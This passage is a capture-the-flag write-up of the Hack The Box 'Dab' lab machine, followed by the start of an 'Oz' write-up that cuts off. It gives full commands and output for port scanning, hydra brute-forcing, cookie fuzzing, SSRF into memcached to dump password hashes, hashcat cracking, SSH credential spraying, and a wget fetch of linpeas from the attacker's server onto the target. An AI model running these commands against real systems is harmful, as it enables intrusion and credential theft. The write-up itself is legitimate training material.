Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~/_HTB/dab]
→ sudo nmap -sCV -p80,21,22,8080 10.10.10.86
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-15 21:52 CET
Nmap scan report for 10.10.10.86
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 8803 Mar 26 2018 dab.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.16
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:05:77:1e:73:66:bb:1e:7d:46:0f:65:50:2c:f9:0e (RSA)
| 256 61:ae:15:23:fc:bc:bc:29:13:06:f2:10:e0:0e:da:a0 (ECDSA)
|_ 256 2d:35:96:4c:5e:dd:5c:c0:63:f0:dc:86:f1:b1:76:b5 (ED25519)
80/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
| http-title: Login
|_Requested resource was http://10.10.10.86/login
8080/tcp open http nginx 1.10.3 (Ubuntu)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Internal Dev
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it:
![](prg/12/1.png)
We investigate using burpsuite's repeater:
![](prg/12/2.png)
Here we investigate the error codes of our login attempts with a possible username (admin) and an improbable one (adminhaha):
![](prg/12/3.png) ![](prg/12/4.png)
So we got the following results:
admin >>> Error: Login failed
adminhaha >>> Error: Login failed**.**
This is something you need to check, do you get the same error message when trying different usernames? and here the error codes are different. which gives us a hint that admin is a username. Since we know that the trailing dot is indicative that we have a correct username, we're going to use hydra to enumerate that.
![](prg/12/5.png)
[DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password;=^PASS^&submit;=Login:Login failed.<
[80][http-post-form] host: 10.10.10.86 login: ADMIN password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: Admin password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: Audrey password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: DEFAULT password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: DEMO password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: Demo password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: admin password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: default password: hahhahhaha
[80][http-post-form] host: 10.10.10.86 login: demo password: hahhahhaha
Now that we have a list of usernames:
[ 10.10.14.16/23 ] [ /dev/pts/5 ] [~/_HTB/dab]
→ cat usernames
ADMIN
Admin
Audrey
DEFAULT
DEMO
Demo
admin
default
demo
we can try to find the password for one of these usernames using hydra and rockyou.txt
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ ls -lash /usr/share/wordlists/rockyou.txt
134M -rw-r--r-- 1 root root 134M Jul 17 2019 /usr/share/wordlists/rockyou.txt
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ hydra -L usernames -P /usr/share/wordlists/rockyou.txt 10.10.10.86 http-post-form "/login:username=^USER^&password;=^PASS^&submit;=Login:failed"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-15 22:58:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 129099591 login tries (l:9/p:14344399), ~8068725 tries per task
[DATA] attacking http-post-form://10.10.10.86:80/login:username=^USER^&password;=^PASS^&submit;=Login:failed
[STATUS] 2643.00 tries/min, 2643 tries in 00:01h, 129096948 to do in 814:05h, 16 active
[80][http-post-form] host: 10.10.10.86 login: ADMIN password: Password1
And it looks like we have credentials ! ADMIN:Password1 so let's login:
![](prg/12/6.png)
It looks like an empty page with nothing useful on it, however it initiated something with memcache as we're going to see later on. To continue, we're going to take a look at port 8080:
![](prg/12/7.png)
And here we get an error message telling us something about the pass auth cookie, so we need to figure out what the cookie is called. To do so we'll use wfuzz, when we run it without any filters we get the 322 character length:
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [/usr/share/wordlists]
→ wfuzz -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" http://10.10.10.86:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/
Total requests: 2588
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000003: 200 14 L 30 W 322 Ch "page"
000000034: 200 14 L 30 W 322 Ch "login"
000000036: 200 14 L 30 W 322 Ch "content"
000000031: 200 14 L 30 W 322 Ch "s"
000000033: 200 14 L 30 W 322 Ch "excerpt"
000000007: 200 14 L 30 W 322 Ch "email"
000000035: 200 14 L 30 W 322 Ch "search"
000000015: 200 14 L 30 W 322 Ch "user"
000000030: 200 14 L 30 W 322 Ch "description"
000000001: 200 14 L 30 W 322 Ch "id"
000000032: 200 14 L 30 W 322 Ch "post"
000000029: 200 14 L 30 W 322 Ch "charset"
000000023: 200 14 L 30 W 322 Ch "order"
000000025: 200 14 L 30 W 322 Ch "p"
000000026: 200 14 L 30 W 322 Ch "key"
000000022: 200 14 L 30 W 322 Ch "mode"
000000028: 200 14 L 30 W 322 Ch "start"
000000024: 200 14 L 30 W 322 Ch "lang"
000000027: 200 14 L 30 W 322 Ch "status"
000000021: 200 14 L 30 W 322 Ch "data"
[...]
So we're going to filter out the 322 character length using the --hh 322 flag:
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: FUZZ" --hh 322 http://10.10.10.86:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/
Total requests: 2588
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000005: 200 14 L 29 W 324 Ch "password"
Total time: 11.62986
Processed Requests: 2588
Filtered Requests: 2587
Requests/sec.: 222.5305
And we found it! the Cookie has to be set to the "password" value. So let's use burpsuite to make this process easier:
![](prg/12/7.png) ![](prg/12/8.png) ![](prg/12/9.png)
as expected, we get the cookie not set error, now let's set the cookie password parameter with a random value:
![](prg/12/10.png)
And as you can see here, we get a different error message than previously, this means that the parameter "password" is valid, but the value that it posesses is not, so let's bruteforce it with a wordlist and as we do so, we need to first know what's the character response length:
![](prg/12/11.png)
In this case it is 324 characters, so we need to use wfuzz's --hh 324 flag:
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ wfuzz -c -w /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -H "Cookie: password=FUZZ" --hh 324 http://10.10.10.86:8080
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/
Total requests: 10000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000097: 200 21 L 48 W 540 Ch "secret"
Total time: 43.05595
Processed Requests: 10000
Filtered Requests: 9999
Requests/sec.: 232.2559
so when you set the cookie parameter 'password' to 'secret' you get the following:
![](prg/12/13.png) ![](prg/12/14.png) ![](prg/12/15.png) ![](prg/12/16.png)
and when you send random values to the prompts you get this url and response:
http://10.10.10.86:8080/socket?port=nothing&cmd;=nowhere
` ![](prg/12/17.png)
Now we don't need to use firefox to manually bruteforce this, let's use curl.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=1&cmd;=nothing'
500 Internal Server Error
# Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd;=nothing' -s |tail +8
Status of cache engine: Online
#### TCP socket test
Output
220 (vsFTPd 3.0.3)
530 Please login with USER and PASS.
%
So here we see something interesting, we can scan the ports from that page. Let's trim out the useless infos from our output:
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=21&cmd;=nothing' -s |tail +20 | head -n -4
220 (vsFTPd 3.0.3)
530 Please login with USER and PASS.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=22&cmd;=nothing' -s |tail +20 | head -n -4
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
Protocol mismatch.
[ 10.10.14.16/23 ] [ /dev/pts/3 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=80&cmd;=nothing' -s |tail +20 | head -n -4
HTTP/1.1 400 Bad Request
Server: nginx/1.10.3 (Ubuntu)
Date: Sat, 16 Jan 2021 09:18:49 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.10.3 (Ubuntu)</center>
</body>
</html>
So let's use wfuzz again to enumerate the ports:
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd;=nothing' -H "Cookie: password=secret" --hc=500
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.86:8080/socket?port=FUZZ&cmd;=nothing
Total requests: 65535
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000021: 200 28 L 61 W 627 Ch "21"
000000022: 200 28 L 55 W 629 Ch "22"
000000080: 200 40 L 84 W 1010 Ch "80"
000008080: 200 40 L 84 W 1010 Ch "8080"
000011211: 200 27 L 52 W 576 Ch "11211"
000050528: 200 27 L 52 W 577 Ch "50528"
looks like we picked up something our nmap scan didnt earlier:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=nothing' -s |tail +20 | head -n -4
ERROR
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=50528&cmd;=nothing' -s |tail +20 | head -n -4
These error codes aren't helpful although we now know that these ports are most likely to be our next steps. So first we do a bit of research on port 11211 and we find that it may correspond to [memcached](https://memcached.org/)
![](prg/12/18.png)
Based on this, we can enumerate memcached further:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=version' -s |tail +20 | head -n -4
VERSION 1.4.25 Ubuntu
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats slabs' -s |tail +20 | head -n -4
STAT 16:chunk_size 2904
STAT 16:chunks_per_page 361
STAT 16:total_pages 1
STAT 16:total_chunks 361
STAT 16:used_chunks 1
STAT 16:free_chunks 360
STAT 16:free_chunks_end 0
STAT 16:mem_requested 2880
STAT 16:get_hits 0
STAT 16:cmd_set 2
STAT 16:delete_hits 0
STAT 16:incr_hits 0
STAT 16:decr_hits 0
STAT 16:cas_hits 0
STAT 16:cas_badval 0
STAT 16:touch_hits 0
STAT 26:chunk_size 27120
STAT 26:chunks_per_page 38
STAT 26:total_pages 1
STAT 26:total_chunks 38
STAT 26:used_chunks 1
STAT 26:free_chunks 37
STAT 26:free_chunks_end 0
STAT 26:mem_requested 24699
STAT 26:get_hits 13640
STAT 26:cmd_set 29
STAT 26:delete_hits 0
STAT 26:incr_hits 0
STAT 26:decr_hits 0
STAT 26:cas_hits 0
STAT 26:cas_badval 0
STAT 26:touch_hits 0
STAT active_slabs 2
STAT total_malloced 2078904
END
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats items' -s |tail +20 | head -n -4
STAT items:16:number 1
STAT items:16:age 48401
STAT items:16:evicted 0
STAT items:16:evicted_nonzero 0
STAT items:16:evicted_time 0
STAT items:16:outofmemory 0
STAT items:16:tailrepairs 0
STAT items:16:reclaimed 0
STAT items:16:expired_unfetched 0
STAT items:16:evicted_unfetched 0
STAT items:16:crawler_reclaimed 0
STAT items:16:crawler_items_checked 0
STAT items:16:lrutail_reflocked 0
STAT items:26:number 1
STAT items:26:age 48410
STAT items:26:evicted 0
STAT items:26:evicted_nonzero 0
STAT items:26:evicted_time 0
STAT items:26:outofmemory 0
STAT items:26:tailrepairs 0
STAT items:26:reclaimed 0
STAT items:26:expired_unfetched 0
STAT items:26:evicted_unfetched 0
STAT items:26:crawler_reclaimed 0
STAT items:26:crawler_items_checked 0
STAT items:26:lrutail_reflocked 0
END
So here we managed to get information on the OS, and the items and memory, which are known as slabs. You can see their ids are either 16 or 26, for each slab we can use **stats cachedump** to give us each item in the slab with its size and expiration timestamp:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats cachedump 16 0' -s |tail +20 | head -n -4
ITEM stock [2807 b; 1610748196 s]
END
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=stats cachedump 26 0' -s |tail +20 | head -n -4
ITEM users [24625 b; 1610748187 s]
END
We can also get Users data:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -s |tail +20 | head -n -4
END
Well, not quite, that is because we need to login like we did earlier:
![](prg/12/19.png)
Once we logged in again, get the users info but format it correctly otherwise this is going to be some unreadable garbage:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -H "Cookie: password=secret" 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -s |tail +20 | head -n -4
VALUE users 0 24625
{"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", "isidro": "e4a4c90483d2ef61de42af1f044087f3", "roy": "afbde995441e19497fe0695e9c539266", "colleen": "d3792794c3143f7e04fd57dc8b085cd4", "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f", "asa.christiansen": "d7505316e9a10fc113126f808663b5a4", "jessie": "71f08b45555acc5259bcefa3af63f4e1", "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84", "demario_homenick": "2c22da161f085a9aba62b9bbedbd4ca7", "paris": "ef9b20082b7c234c91e165c947f10b71", "gardner_ward": "eb7ed0e8c112234ab1439726a4c50162", "daija.casper": "4d0ed472e5714e5cca8ea7272b15173a", "alanna.prohaska": "6980ba8ee392b3fa6a054226b7d8dd8f", "russell_borer": "cb10b94b5dbb5dfab049070a2abda16e", "domenica.kulas": "5cb322691472f05130416b05b22d4cdf", "davon.kuhic": "e301e431db395ab3fdc123ba8be93ff9", "alana": "41c85abbc7c64d93ca7bda5e2cfc46c2", "bryana": "4d0da0f96ecd0e8b655573cd67b8a1c1", "elmo_welch": "89122bf3ade23faf37b470f1fa5c7358", "sasha": "fbabdcc0eb2ace9aa5b88148a02f78fe", "krystina.lynch": "1b4b73070f563b787afaf435943fac9c", "rick_kirlin": "8952b9d5be0dcb77bdf349cc0e79b49d", "elenora": "edbe5879fa4e452ceceedccf59067409", "broderick": "
[...]
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab] → curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . { "quinton_dach": "17906b445a05dc42f78ae86a92a57bbd", "jackie.abbott": "c6ab361604c4691f78958d6289910d21", "isidro": "e4a4c90483d2ef61de42af1f044087f3", "roy": "afbde995441e19497fe0695e9c539266", "colleen": "d3792794c3143f7e04fd57dc8b085cd4", "harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f", "asa.christiansen": "d7505316e9a10fc113126f808663b5a4", "jessie": "71f08b45555acc5259bcefa3af63f4e1", "milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84", [...] }
Thing is, you need to log back in to be able to keep reading the users data because after 1 minute the data gets cleared out of memcache. So we're going to save it to a file
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ curl -s 'http://10.10.10.86:8080/socket?port=11211&cmd;=get users' -H "Cookie: password=secret" | recode html..ascii | sed -n '/VALUE/{:a;n;/END/b;p;ba}' | jq . > users.txt
Now here we need to get the hashes out of that json file:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json
{
"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
"jackie.abbott": "c6ab361604c4691f78958d6289910d21",
"isidro": "e4a4c90483d2ef61de42af1f044087f3",
"roy": "afbde995441e19497fe0695e9c539266",
"colleen": "d3792794c3143f7e04fd57dc8b085cd4",
[...]
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json | jq -r 'to_entries | .[].value' |head -n10
17906b445a05dc42f78ae86a92a57bbd
c6ab361604c4691f78958d6289910d21
e4a4c90483d2ef61de42af1f044087f3
afbde995441e19497fe0695e9c539266
d3792794c3143f7e04fd57dc8b085cd4
bc5f9b43a0336253ff947a4f8dbdb74f
d7505316e9a10fc113126f808663b5a4
71f08b45555acc5259bcefa3af63f4e1
8f61be2ebfc66a5f2496bbf849c89b84
2c22da161f085a9aba62b9bbedbd4ca7
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json | jq -r 'to_entries | .[].value' > hashes
Once we have the hashes saved into a file, we can use hashcat to crack them, and 12 of them returned:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ hashcat -a 0 -m 0 hashes /usr/share/wordlists/rockyou.txt --force -o cracked
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ hashcat users-hashes --show
eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
fc7992e8952a8ff5000cb7856d8586d2:Princess1
fe01ce2a7fbac8fafaed7c982a04e229:demo
2ac9cb7dc02b3c0083eb70898e549b63:Password1
254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
c21f969b5f03d33d43e04f8f136e7682:default
9731e89f01c1fb943cf0baa6772d2875:piggy
0ef9c986fad340989647f0001e3555d4:misfits
5177790ad6df0ea98db41b37b602367c:strength
6f9ff93a26a118b460c878dc30e17130:monkeyman
1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
So now we have a massive list of users and 12 passwords with only the hashes in common:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat users.json | head -n10
{
"quinton_dach": "17906b445a05dc42f78ae86a92a57bbd",
"jackie.abbott": "c6ab361604c4691f78958d6289910d21",
"isidro": "e4a4c90483d2ef61de42af1f044087f3",
"roy": "afbde995441e19497fe0695e9c539266",
"colleen": "d3792794c3143f7e04fd57dc8b085cd4",
"harrison.hessel": "bc5f9b43a0336253ff947a4f8dbdb74f",
"asa.christiansen": "d7505316e9a10fc113126f808663b5a4",
"jessie": "71f08b45555acc5259bcefa3af63f4e1",
"milton_hintz": "8f61be2ebfc66a5f2496bbf849c89b84",
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user-hashes
eb95fc1ab8251cf1f8f870e7e4dae54d:megadeth
fc7992e8952a8ff5000cb7856d8586d2:Princess1
fe01ce2a7fbac8fafaed7c982a04e229:demo
2ac9cb7dc02b3c0083eb70898e549b63:Password1
254e5f2c3beb1a3d03f17253c15c07f3:hacktheplanet
c21f969b5f03d33d43e04f8f136e7682:default
9731e89f01c1fb943cf0baa6772d2875:piggy
0ef9c986fad340989647f0001e3555d4:misfits
5177790ad6df0ea98db41b37b602367c:strength
6f9ff93a26a118b460c878dc30e17130:monkeyman
1e0ad2ec7e8c3cc595a9ec2e3762b117:blaster
0daa6275280be3cf03f9f9c62f9d26d1:lovesucks1
:w
Since the hash is what these 2 files have in common, we're going to use it to end up with a file that contains 'username:password' so that it can be ran into hydra.
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done
"wendell":megadeth
"genevieve":Princess1
"demo":demo
"admin":Password1
"d_murphy":hacktheplanet
"default":default
"abbigail":piggy
"aglae":misfits
"irma":strength
"ona":monkeyman
"alec":blaster
"rick":lovesucks1
:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user-hashes| while read c; do hash=$(echo ${c} | cut -d: -f1); pass=$(echo $c |cut -d: -f2); username=$(grep ${hash} users.json | cut -d: -f1 ); echo "${username}:${pass}"; done > user_pass
Then cut out the " characters since hydra doesn't need these (:%s/"//gi , :wq )
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ cat user_pass
wendell:megadeth
genevieve:Princess1
demo:demo
admin:Password1
d_murphy:hacktheplanet
default:default
abbigail:piggy
aglae:misfits
irma:strength
ona:monkeyman
alec:blaster
rick:lovesucks1
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ hydra -C user_pass ssh://10.10.10.86
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (http://www.thc.org/thc-hydra) starting at 2020-01-16 14:16:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries, ~1 try per task
[DATA] attacking ssh://10.10.10.86:22/
[22][ssh] host: 10.10.10.86 login: genevieve password: Princess1
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-01-16 14:16:00
And we found credentials ! genevieve:Princess1 so let's login via ssh:
[ 10.10.14.16/23 ] [ /dev/pts/6 ] [~/_HTB/dab]
→ ssh genevieve@10.10.10.86
The authenticity of host '10.10.10.86 (10.10.10.86)' can't be established.
ECDSA key fingerprint is SHA256:3gHAJvc1zomI4M6+oCp/3xrMyS6DMPbMFEGDbBO2Qso.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.86' (ECDSA) to the list of known hosts.
genevieve@10.10.10.86's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-133-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
Last login: Mon Mar 26 23:42:41 2018 from 172.23.10.99
genevieve@dab:~$ id
uid=1000(genevieve) gid=1000(genevieve) groups=1000(genevieve)
genevieve@dab:~$ cat user.txt
9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! we managed to find the user flag.
## **Part 3 : Getting Root Access**
Now let's enumerate this box from genevieve's POV, to do so we'll use the linpeas script:
genevieve@dab:~$ which wget ; which curl
/usr/bin/wget
/usr/bin/curl
Looks like both curl and wget are on the server, this means that we will be able to upload our script onto the server easily, most likely in /tmp or in /dev/shm.
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
--2021-01-16 14:29:02-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.64.133, 151.101.0.133, 151.101.192.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.64.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 319969 (312K) [text/plain]
Saving to: linpeas.sh
linpeas.sh 100%[============================================================================================>] 312.47K --.-KB/s in 0.09s
2021-01-16 14:29:02 (3.36 MB/s) - linpeas.sh saved [319969/319969]
[ 10.10.14.16/23 ] [ /dev/pts/4 ] [~/_HTB/dab]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
genevieve@dab:/dev/shm$ wget http://10.10.14.16:9090/linpeas.sh
--2021-01-16 08:30:02-- http://10.10.14.16:9090/linpeas.sh
Connecting to 10.10.14.16:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 319969 (312K) [text/x-sh]
Saving to: linpeas.sh
linpeas.sh 100%[============================================================================================>] 312.47K 715KB/s in 0.4s
2021-01-16 08:30:02 (715 KB/s) - linpeas.sh saved [319969/319969]
genevieve@dab:/dev/shm$ chmod +x linpeas.sh
genevieve@dab:/dev/shm$ ./linpeas.sh
` ![](prg/12/20.png)
Let it run, and then you can inspect what's interesting, most importantly the /sbin/ldconfig binary has the setuid bit enabled to run as root. ldconfig:
![](prg/12/21.png)
[ 10.10.14.16/23 ] [ /dev/pts/5 ] [~]
→ man ldconfig
DESCRIPTION
ldconfig creates the necessary links and cache to the most recent shared libraries found in the directories specified on the command line, in the file
/etc/ld.so.conf, and in the trusted directories, /lib and /usr/lib (on some 64-bit architectures such as x86-64, /lib and /usr/lib are the trusted directories for
32-bit libraries, while /lib64 and /usr/lib64 are used for 64-bit libraries).
The cache is used by the run-time linker, ld.so or ld-linux.so. ldconfig checks the header and filenames of the libraries it encounters when determining which ver
sions should have their links updated.
ldconfig will attempt to deduce the type of ELF libraries (i.e., libc5 or libc6/glibc) based on what C libraries, if any, the library was linked against.
The second binary we need is located in /usr/bin/myexec:
![](prg/12/22.png)
## **Conclusion**
Here we can see the progress graph :

618
Hard/13.md Normal file
View file

@ -0,0 +1,618 @@
# Oz Writeup
![](img/13.png)
## Introduction :
Oz is a hard linux box released back in September 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.96 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Discovered open port 8080/tcp on 10.10.10.96
Discovered open port 80/tcp on 10.10.10.96
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.16/23 ] [ /dev/pts/1 ] [~]
→ nmap -sCV -p 80,8080 10.10.10.96
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 11:52 CET
Nmap scan report for 10.10.10.96
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
80/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
|_http-server-header: Werkzeug/0.14.1 Python/2.7.14
|_http-title: OZ webapi
|_http-trane-info: Problem with XML parsing of /evox/about
8080/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.14)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-title: GBR Support - Login
|_Requested resource was http://10.10.10.96:8080/login
|_http-trane-info: Problem with XML parsing of /evox/about
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds
## **Part 2 : Getting User Access**
The nmap scan hints us towards port 80 and 8080 so let's try to enumerate it:
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
